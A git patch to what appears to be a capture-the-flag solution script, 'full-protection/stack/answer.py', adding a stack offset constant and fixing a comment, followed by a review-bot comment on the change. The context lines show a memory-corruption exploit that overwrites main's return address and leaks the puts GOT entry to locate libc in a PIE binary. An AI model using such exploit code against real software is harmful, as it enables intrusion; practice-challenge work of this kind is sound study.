From 83d01532b8c9dcf2d9101a2fb81401c7932ef7c4 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Fri, 17 Sep 2021 14:50:20 +0800
Subject: [PATCH] Fixed full-protection/stack

---
 full-protection/stack/answer.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/full-protection/stack/answer.py b/full-protection/stack/answer.py
index 565193a..efd28ef 100755
--- a/full-protection/stack/answer.py
+++ b/full-protection/stack/answer.py
@@ -61,6 +61,10 @@ print("puts GOT: %s" % hex(puts_got))
 # Cannot use puts PLT to leak puts GOT there at return of main
 # because PIE mode PLT use EBX to store offset but when returning EBX is null
+# A unified shift was applied to original shift to use in main's stack frame
+# Because of the compiler's alignment
+unified_shift = 4
+
 # Write main retaddr at shift 89 to call puts
 write_stack(p, 89 + unified_shift, puts_got)
 # Write retaddr of puts at shift 90 back to main
@@ -71,7 +75,7 @@ execute(p)
 puts_libc = u32(p.recv(4))
 """
-# Leask puts_got by using a
+# Leak puts_got by using a arbitary memory read
 puts_libc = read_stack(p, (puts_got - user_stack_base) / 4)
 print("puts libc: %s" % hex(puts_libc))
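Review bot: The added `unified_shift = 4` is a bare magic number whose comment says it exists "because of the compiler's alignment" but not how the value was obtained, so anyone who rebuilds the target binary has no way to tell whether the `89 + unified_shift` and `90 + ...` slot offsets in the surrounding context lines are still valid. The unchanged `write_stack(p, 89 + unified_shift, puts_got)` line already referenced `unified_shift` before this commit, so unless it was defined further up outside the hunk the old script failed with a NameError; that is the actual bug being fixed and is worth stating in the commit message rather than just "Fixed". I would replace the two new comment lines with a note that records the derivation and the invalidation condition, e.g. `# Slot offset between the hard-coded stack indices below and main's real frame in this build (presumably the same 4-byte slot units read_stack/write_stack use — confirm). Re-derive by leaking the stack and locating main's saved return address whenever the binary or compiler flags change.` Both write_stack calls that consume this value sit outside the added lines, and the enclosing script continues past the hunk.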